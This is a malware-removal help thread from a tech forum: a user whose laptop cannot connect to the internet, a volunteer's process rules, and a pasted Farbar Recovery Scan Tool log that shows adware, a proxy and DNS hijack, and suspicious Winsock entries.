Solved Virus won't let my laptop connect to internet

hersheychoco

I've already tried the proxy setting and I've already tried to reset my host file. I scanned my computer at first and ASC was able to stop the virus from blocking my firewall settings so I was able to change them but I still cannot connect to the internet. Please someone help, I need this laptop for school :(
 
Welcome aboard

Please complete all steps listed here: https://www.techspot.com/community/...lware-removal-preliminary-instructions.58138/
Make sure you PASTE all logs. If a log exceeds the 50,000-character post limit, split it between a couple of replies.
Attached logs won't be reviewed.

Please observe the following rules:
  • Read all of my instructions very carefully. Your mistakes during the cleaning process may have very serious consequences, like an unbootable computer.
  • If you're stuck, or you're not sure about a certain step, always ask before doing anything else.
  • Please refrain from running any tools, fixes or applying any changes to your computer other than those I suggest.
  • Never run more than one scan at a time.
  • Keep updating me regarding your computer's behavior, good or bad.
  • The cleaning process, once started, has to be completed. Even if your computer appears to act better, it may still be infected. Once the computer is totally clean, I'll certainly let you know.
  • If you leave the topic without explanation in the middle of a cleaning process, you may not be eligible to receive any more help in the malware removal forum.
  • I close my topics if you have not replied in 5 days. If you need more time, simply let me know. If I closed your topic and you need it to be reopened, simply PM me.
 
FRST.txt
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:31-12-2015
Ran by hersheychoco9 (administrator) on CHOCOYAUTJA (05-01-2016 17:08:26)
Running from D:\Utilities
Loaded Profiles: hersheychoco9 (Available Profiles: hersheychoco9 & Administrator)
Platform: Windows 8.1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: IE)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool:

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Wacom Technology, Corp.) C:\Program Files\Tablet\Pen\WTabletServiceCon.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Elements 11 Organizer\PhotoshopElementsFileAgent.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
(Andrea Electronics Corporation) C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe
(Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
(Intel(R) Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(IObit) C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe
(Intel(R) Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(Roboscan Inc) C:\Program Files\Roboscan\Roboscan\RSRTSrv.rse
(Roboscan Inc) C:\Program Files\Roboscan\Roboscan\RSUpdSrv.rse
(Paltiosoft Inc.) C:\Program Files (x86)\SoftDenchi\UCManSvc.exe
(Wondershare) C:\Program Files (x86)\Wondershare\WAF\WsAppService.exe
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
(Microsoft Corporation) C:\WINDOWS\System32\dllhost.exe
(Microsoft Corporation) C:\WINDOWS\System32\SkyDrive.exe
(Wacom Technology, Corp.) C:\Program Files\Tablet\Pen\Pen_TabletUser.exe
(Wacom Technology) C:\Program Files\Tablet\Pen\WacomHost.exe
(Wacom Technology, Corp.) C:\Program Files\Tablet\Pen\Pen_Tablet.exe
(Wacom Technology, Corp.) C:\Program Files\Tablet\Pen\Pen_TouchUser.exe
(Microsoft Corporation) C:\WINDOWS\System32\rundll32.exe
(Microsoft Corporation) C:\WINDOWS\System32\rundll32.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Microsoft Corporation) C:\WINDOWS\System32\InputMethod\JPN\JpnIME.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Microsoft Corporation) C:\WINDOWS\SysWOW64\rundll32.exe
(Microsoft Corporation) C:\WINDOWS\SysWOW64\rundll32.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Dell Inc.) C:\Program Files\Dell\QuickSet\quickset.exe
(Intel Corporation) C:\WINDOWS\System32\igfxtray.exe
(Intel Corporation) C:\WINDOWS\System32\hkcmd.exe
(Intel Corporation) C:\WINDOWS\System32\igfxsrvc.exe
(Intel Corporation) C:\WINDOWS\System32\igfxpers.exe
(Roboscan Inc) C:\Program Files\Roboscan\Roboscan\RSAgent.rse
(Microsoft Corporation) C:\WINDOWS\System32\rundll32.exe
(Microsoft Corporation) C:\WINDOWS\SysWOW64\rundll32.exe
(Wondershare) C:\Program Files (x86)\Wondershare\MobileGo\MobileGoService.exe
(Roboscan Inc) C:\Program Files\Roboscan\Roboscan\Roboscan.rse
(Microsoft Corporation) C:\WINDOWS\System32\SettingSyncHost.exe
(Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
(IObit) C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallMonitor.exe
() C:\Users\hersheychoco9\AppData\Local\BrowserAir\44.5.0.2\updater.exe
(Motorola Solutions, Inc.) C:\Program Files (x86)\Intel\Bluetooth\devmonsrv.exe
(Motorola Solutions, Inc.) C:\Program Files (x86)\Intel\Bluetooth\obexsrv.exe
(Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(SoftThinks SAS) C:\Program Files (x86)\Dell Backup and Recovery\SftService.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(SoftThinks - Dell) C:\Program Files (x86)\Dell Backup and Recovery\Components\DBRUpdate\DBRUpd.exe
(SoftThinks - Dell) C:\Program Files (x86)\Dell Backup and Recovery\Toaster.exe
(Microsoft Corporation) C:\WINDOWS\SysWOW64\wbem\WmiPrvSE.exe
() C:\Program Files (x86)\Dell Backup and Recovery\Components\Shell\DBRCrawler.exe
(Microsoft Corporation) C:\WINDOWS\System32\rundll32.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Roboscan Inc) C:\Program Files\Roboscan\Roboscan\RSShell.rse

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [7506648 2013-12-27] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1374424 2014-01-09] (Realtek Semiconductor)
HKLM\...\Run: [QuickSet] => c:\Program Files\Dell\QuickSet\QuickSet.exe [5789512 2014-01-15] (Dell Inc.)
HKLM\...\Run: [BTMTrayAgent] => rundll32.exe "C:\Program Files (x86)\Intel\Bluetooth\btmshellex.dll",TrayApp
HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [287592 2013-08-30] (Intel Corporation)
HKLM\...\Run: [Roboscan] => c:\program files\roboscan\roboscan\RSLaunch.exe [257856 2013-11-18] (Roboscan Inc)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [508104 2015-09-04] (Adobe Systems Incorporated)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\Run: [ezvtum] => rundll32.exe "C:\Users\hersheychoco9\AppData\Local\ezvtum.dll",ezvtum <===== ATTENTION
HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\Run: [CCleaner Monitoring] => C:\Users\hersheychoco9\Desktop\Utilities\CCleaner\CCleaner64.exe [8418584 2015-07-17] (Piriform Ltd)
HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\MountPoints2: {4d6de65c-5455-11e4-825b-a0886955d281} - "D:\VZW_Software_upgrade_assistant.exe"
HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\MountPoints2: {65359199-e247-11e4-828b-a0886955d281} - "D:\HTC_Sync_Manager_PC.exe"
HKU\S-1-5-21-1030869394-3123877279-975090705-1001\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\Windows\system32\Bubbles.scr [788480 2014-10-28] (Microsoft Corporation)
HKU\S-1-5-18\...\Run: [] => 0
HKU\S-1-5-18\...\Run: [WeatherBug] => C:\Program Files\Earth Networks\WeatherBug\WeatherBug.exe
ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2015-09-11] ()
ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2015-09-11] ()
ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2015-09-11] ()
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => No File
ShellIconOverlayIdentifiers: [DBARFileBackuped] -> {831cebdd-6baf-4432-be76-9e0989c14aef} => C:\Windows\system32\mscoree.dll [2013-08-22] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [DBARFileNotBackuped] -> {275e4fd7-21ef-45cf-a836-832e5d2cc1b3} => C:\Windows\system32\mscoree.dll [2013-08-22] (Microsoft Corporation)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\MobileGo Service.lnk [2015-10-29]
ShortcutTarget: MobileGo Service.lnk -> C:\Program Files (x86)\Wondershare\MobileGo\MobileGoService.exe (Wondershare)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Roboscan Internet Security [2014-10-10] ()
Startup: C:\Users\hersheychoco9\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Curse.lnk [2015-05-14]
ShortcutTarget: Curse.lnk -> C:\Users\hersheychoco9\AppData\Roaming\Curse Client\Bin\Curse.exe (Curse, Inc)
BootExecute: autocheck autochk * bootroboscan.exe

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

ProxyServer: [S-1-5-21-1030869394-3123877279-975090705-1001] => http=127.0.0.1:8800
Winsock: Catalog9 01 C:\Windows\system32\Comvud.dll No File
Winsock: Catalog9 02 C:\Windows\system32\Comvud.dll No File
Winsock: Catalog9 03 C:\Windows\system32\Comvud.dll No File
Winsock: Catalog9 04 C:\Windows\system32\Comvud.dll No File
Winsock: Catalog9 16 C:\Windows\system32\Comvud.dll No File
Winsock: Catalog9-x64 01 C:\Windows\system32\Comvud64.dll [768368 2015-12-28] ()
Winsock: Catalog9-x64 02 C:\Windows\system32\Comvud64.dll [768368 2015-12-28] ()
Winsock: Catalog9-x64 03 C:\Windows\system32\Comvud64.dll [768368 2015-12-28] ()
Winsock: Catalog9-x64 04 C:\Windows\system32\Comvud64.dll [768368 2015-12-28] ()
Winsock: Catalog9-x64 16 C:\Windows\system32\Comvud64.dll [768368 2015-12-28] ()
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{8718928D-CBEB-45EA-A621-800A9249001D}: [NameServer] 208.87.151.17,208.87.151.16
Tcpip\..\Interfaces\{8D32E4AD-6D5F-4475-9B56-EA1EDF88081D}: [NameServer] 208.87.151.17,208.87.151.16
Tcpip\..\Interfaces\{9D26E07C-D4C8-4B1E-B9E8-A0AF8D2D2A78}: [NameServer] 208.87.151.17,208.87.151.16
Tcpip\..\Interfaces\{EF083E6B-E699-4F22-B8D6-6AFFF4638C72}: [NameServer] 208.87.151.17,208.87.151.16
Tcpip\..\Interfaces\{EF083E6B-E699-4F22-B8D6-6AFFF4638C72}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{FE2B955A-7119-470B-99F7-D23E3FE58734}: [NameServer] 208.87.151.17,208.87.151.16
Tcpip\..\Interfaces\{FE2B955A-7119-470B-99F7-D23E3FE58734}: [DhcpNameServer] 75.75.76.76 75.75.75.75

Internet Explorer:
==================
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 -> DefaultScope {6EB44F16-E471-4C00-BC7C-49D2839C991D} URL =
SearchScopes: HKU\S-1-5-21-1030869394-3123877279-975090705-1001 -> {6EB44F16-E471-4C00-BC7C-49D2839C991D} URL =
BHO: ExplorerWnd Helper -> {10921475-03CE-4E04-90CE-E2E7EF20C814} -> C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallExplorer64.dll [2015-09-21] (IObit)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_60\bin\ssv.dll [2015-10-06] (Oracle Corporation)
Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2015-10-12] (Microsoft Corporation)

FireFox:
========
FF ProfilePath: C:\Users\hersheychoco9\AppData\Roaming\Mozilla\Firefox\Profiles\6jvaf1qu.default
FF Homepage: user_pref("browser.startup.homepage","hxxp://www.only-search.com/?babsrc=HP_kms&affID=970000014");
FF SelectedSearchEngineuser_pref("browser.search.selectedEngine","Search The Web (Only-Search)");: user_pref("browser.search.selectedEngine","Search The Web (Only-Search)");
FF DefaultSearchEngineuser_pref("browser.search.defaultenginename","Search The Web (Only-Search)");: user_pref("browser.search.defaultenginename","Search The Web (Only-Search)");
FF Keyword.URL: user_pref("keyword.URL","hxxp://www.only-search.com/?babsrc=KW_kms&affID=$afltId$&q=");
FF NewTab: user_pref("browser.newtab.url","hxxp://www.only-search.com/?babsrc=NT_kms&affID=970000014");
FF Plugin: @wacom.com/wtPlugin,version=2.1.0.7 -> C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll [2014-03-25] (Wacom)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2015-09-17] (Adobe Systems)
FF Plugin: wacom.com/WacomTabletPlugin -> C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll [2014-03-25] (Wacom)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-12-18] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-12-18] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.60.2 -> C:\Program Files (x86)\Java\jre1.8.0_60\bin\dtplugin\npDeployJava1.dll [2015-10-06] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.60.2 -> C:\Program Files (x86)\Java\jre1.8.0_60\bin\plugin2\npjp2.dll [2015-10-06] (Oracle Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-04] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-04] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2015-04-13] (VideoLAN)
FF Plugin-x32: @wacom.com/wtPlugin,version=2.1.0.7 -> C:\Program Files (x86)\TabletPlugins\npWacomTabletPlugin.dll [2014-03-25] (Wacom)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2015-09-17] (Adobe Systems)
FF Plugin-x32: wacom.com/WacomTabletPlugin -> C:\Program Files (x86)\TabletPlugins\npWacomTabletPlugin.dll [2014-03-25] (Wacom)
FF user.js: detected! => C:\Users\hersheychoco9\AppData\Roaming\Mozilla\Firefox\Profiles\6jvaf1qu.default\user.js [2015-12-29]
FF SearchPlugin: C:\Users\hersheychoco9\AppData\Roaming\Mozilla\Firefox\Profiles\6jvaf1qu.default\searchplugins\onlysearchkms1.xml [2015-12-28]
FF HKLM\...\Firefox\Extensions: [{1E5EEC8E-2CFF-4C0B-84C7-19D10F0CAF75}] - C:\Program Files\shopperz291220150559\Firefox\{1E5EEC8E-2CFF-4C0B-84C7-19D10F0CAF75}.xpi => not found
FF HKLM-x32\...\Firefox\Extensions: [jid1-xNAj4KGyf5wyhg@jetpack] - C:\Program Files (x86)\Faster Web\faster-web.xpi => not found
FF HKLM-x32\...\Firefox\Extensions: [{1E5EEC8E-2CFF-4C0B-84C7-19D10F0CAF75}] - C:\Program Files\shopperz291220150559\Firefox\{1E5EEC8E-2CFF-4C0B-84C7-19D10F0CAF75}.xpi => not found

Chrome:
=======
CHR Profile: C:\Users\hersheychoco9\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Docs) - C:\Users\hersheychoco9\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-12-28]
CHR Extension: (Google Drive) - C:\Users\hersheychoco9\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-12-28]
CHR Extension: (YouTube) - C:\Users\hersheychoco9\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-12-28]
CHR Extension: (Google Search) - C:\Users\hersheychoco9\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-12-28]
CHR Extension: (Gmail) - C:\Users\hersheychoco9\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-12-28]
CHR Extension: (Pool Component) - C:\Users\hersheychoco9\AppData\Local\Pool Component\Component [2016-01-05]
CHR HKLM-x32\...\Chrome\Extension: [gihfmmedoddijgnhkgfgnkeohkpbipol] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2015-10-12]

==================== Services (Whitelisted) ========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AdobeActiveFileMonitor11.0; C:\Program Files (x86)\Adobe\Elements 11 Organizer\PhotoshopElementsFileAgent.exe [171600 2012-09-23] (Adobe Systems Incorporated)
R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [669872 2015-09-15] (Adobe Systems Incorporated)
S2 AdvancedSystemCareService8; D:\Utilities\Advanced SystemCare 8\ASCService.exe [814880 2015-04-03] (IObit)
R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2016448 2015-11-25] (Adobe Systems, Incorporated)
R2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1433216 2015-10-12] (Microsoft Corporation)
R2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1773696 2015-10-12] (Microsoft Corporation)
S3 DellProdRegManager; C:\Program Files (x86)\Dell Product Registration\regmgrsvc.exe [139328 2014-02-19] (Aviata, Inc.)
R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [15720 2013-08-30] (Intel Corporation)
R2 Intel(R) Capability Licensing Service Interface; c:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-27] (Intel(R) Corporation) [File not signed]
S3 Intel(R) Capability Licensing Service TCP IP Interface; c:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [828376 2013-08-27] (Intel(R) Corporation)
S2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [169432 2013-12-18] (Intel Corporation)
R2 LiveUpdateSvc; C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe [2909472 2015-07-29] (IObit)
S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [284912 2013-10-11] ()
R2 Roboscan_RTSrv; C:\Program Files\Roboscan\Roboscan\RSRTSrv.rse [439104 2013-11-18] (Roboscan Inc)
R2 Roboscan_UpdSrv; C:\Program Files\Roboscan\Roboscan\RSUpdSrv.rse [842048 2013-11-18] (Roboscan Inc)
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [290520 2014-01-08] (Realtek Semiconductor)
R2 SftService; C:\Program Files (x86)\Dell Backup and Recovery\sftservice.exe [1924328 2014-09-18] (SoftThinks SAS)
R2 UCManSvc; C:\Program Files (x86)\SoftDenchi\UCManSvc.exe [241808 2010-03-12] (Paltiosoft Inc.) [File not signed]
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [366552 2015-07-07] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23824 2015-07-07] (Microsoft Corporation)
R2 WsAppService; C:\Program Files (x86)\Wondershare\WAF\WsAppService.exe [356352 2015-09-23] (Wondershare) [File not signed]
R2 WTabletServiceCon; C:\Program Files\Tablet\Pen\WTabletServiceCon.exe [656664 2014-08-19] (Wacom Technology, Corp.)
R2 ZeroConfigService; C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe [3671792 2013-10-11] (Intel® Corporation)
S2 NetprotAdp; no ImagePath
S2 SushiLeadsUpdaterService; no ImagePath
S2 Update Simple for You; no ImagePath
S2 WajaNetEn Monitor; no ImagePath
S3 WsDrvInst; no ImagePath
 
===================== Drivers (Whitelisted) ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R3 BthA2DP; C:\Windows\system32\drivers\BthA2DP.sys [131328 2014-10-08] (Microsoft Corporation)
R3 BthHFAud; C:\Windows\system32\DRIVERS\BthHfAud.sys [32768 2014-10-08] (Microsoft Corporation)
R3 btmaux; C:\Windows\system32\DRIVERS\btmaux.sys [140600 2013-07-22] (Motorola Solutions, Inc.)
R3 btmhsf; C:\Windows\system32\DRIVERS\btmhsf.sys [1408824 2013-10-18] (Motorola Solutions, Inc.)
S3 DDDriver; C:\Windows\system32\drivers\DDDriver64Dcsa.sys [23760 2015-01-30] (Dell Computer Corporation)
S3 DellProf; C:\Windows\system32\drivers\DellProf.sys [23312 2015-01-30] (Dell Computer Corporation)
R3 DellRbtn; C:\Windows\System32\drivers\DellRbtn.sys [10752 2013-01-24] (OSR Open Systems Resources, Inc.)
S0 ebdrv; C:\Windows\System32\drivers\evbda.sys [3357024 2013-08-22] (Broadcom Corporation)
R3 ibtusb; C:\Windows\system32\DRIVERS\ibtusb.sys [142280 2013-10-19] (Intel Corporation)
S3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [192216 2015-12-29] (Malwarebytes)
R3 MEIx64; C:\Windows\System32\drivers\TeeDriverx64.sys [100824 2013-12-18] (Intel Corporation)
R3 NETwNb64; C:\Windows\system32\DRIVERS\NETwbw02.sys [3607520 2013-10-14] (Intel Corporation)
R0 PxHlpa64; C:\Windows\System32\Drivers\PxHlpa64.sys [56336 2012-08-10] (Corel Corporation)
R3 RoboFww; c:\program files\roboscan\roboscan\plugin\realtime\RoboFww.sys [35616 2013-11-18] (Roboscan Inc)
R3 SynRMIHID; C:\Windows\system32\DRIVERS\SynRMIHID.sys [41200 2014-01-16] (Synaptics Incorporated)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44560 2015-07-07] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [270168 2015-07-07] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114520 2015-07-07] (Microsoft Corporation)
S3 WinRing0_1_2_0; C:\Program Files (x86)\IObit\Game Booster 3\Driver\WinRing0x64.sys [14544 2010-11-01] (OpenLibSys.org)
S1 BAPIDRV; system32\DRIVERS\BAPIDRV64.sys [X]
S1 cherimoya; system32\drivers\cherimoya.sys [X]
S3 EagleX64; \??\C:\Windows\system32\drivers\EagleX64.sys [X]
S3 iscFlash; \??\C:\Users\HERSHE~1\AppData\Local\Temp\7zS2B1B.tmp\iscflashx64.sys [X]
S3 PCDSRVC{3B54B31B-D06B6431-06020200}_0; \??\c:\program files\dell\supportassist\pcdsrvc_x64.pkms [X]
S3 X6va029; \??\C:\Windows\SysWOW64\Drivers\X6va029 [X]
S1 {b9ae98e0-3c49-4d93-b43a-0f0a909e378d}Gw64; system32\drivers\{b9ae98e0-3c49-4d93-b43a-0f0a909e378d}Gw64.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-01-05 17:08 - 2016-01-05 17:08 - 00000000 ____D C:\FRST
2015-12-29 16:23 - 2015-12-29 16:23 - 00806882 _____ C:\Users\hersheychoco9\Desktop\UsbFix_Report.txt
2015-12-29 16:11 - 2015-12-29 16:11 - 00002860 _____ C:\Windows\System32\Tasks\CCleanerSkipUAC
2015-12-29 16:06 - 2015-12-29 16:06 - 18823680 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Xaml.dll
2015-12-29 16:06 - 2015-12-29 16:06 - 15159296 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.Xaml.dll
2015-12-29 16:06 - 2015-12-29 16:06 - 02476376 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tcpip.sys
2015-12-29 16:06 - 2015-12-29 16:06 - 00428888 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\FWPKCLNT.SYS
2015-12-29 16:05 - 2015-12-29 16:24 - 00000000 ____D C:\Users\hersheychoco9\Desktop\Utilities
2015-12-29 16:05 - 2015-12-29 16:05 - 01113944 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ndis.sys
2015-12-29 16:05 - 2015-12-29 16:05 - 00487256 _____ (Microsoft Corporation) C:\Windows\system32\netcfgx.dll
2015-12-29 16:05 - 2015-12-29 16:05 - 00393560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\netcfgx.dll
2015-12-29 16:04 - 2015-12-29 16:04 - 06521800 _____ (Microsoft Corporation) C:\Windows\system32\sppsvc.exe
2015-12-29 16:04 - 2015-12-29 16:04 - 01488000 _____ (Microsoft Corporation) C:\Windows\system32\sppobjs.dll
2015-12-29 16:04 - 2015-12-29 16:04 - 01201664 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\bthport.sys
2015-12-29 16:04 - 2015-12-29 16:04 - 00261376 _____ (Microsoft Corporation) C:\Windows\system32\sppwinob.dll
2015-12-29 16:04 - 2015-12-29 16:04 - 00081920 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\BTHUSB.SYS
2015-12-29 16:04 - 2015-12-29 16:04 - 00053248 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\bthenum.sys
2015-12-29 16:02 - 2015-12-29 16:02 - 02819584 _____ (Microsoft Corporation) C:\Windows\system32\SettingsHandlers.dll
2015-12-29 16:02 - 2015-12-29 16:02 - 02171904 _____ (Microsoft Corporation) C:\Windows\system32\SystemSettingsAdminFlowUI.dll
2015-12-29 16:02 - 2015-12-29 16:02 - 01091072 _____ (Microsoft Corporation) C:\Windows\system32\MrmCoreR.dll
2015-12-29 16:02 - 2015-12-29 16:02 - 00790528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MrmCoreR.dll
2015-12-29 16:02 - 2015-12-29 16:02 - 00672984 _____ (Microsoft Corporation) C:\Windows\system32\MDMAgent.exe
2015-12-29 16:02 - 2015-12-29 16:02 - 00463872 _____ (Microsoft Corporation) C:\Windows\system32\SystemSettings.Handlers.dll
2015-12-29 16:02 - 2015-12-29 16:02 - 00273240 _____ (Microsoft Corporation) C:\Windows\system32\SystemSettingsAdminFlows.exe
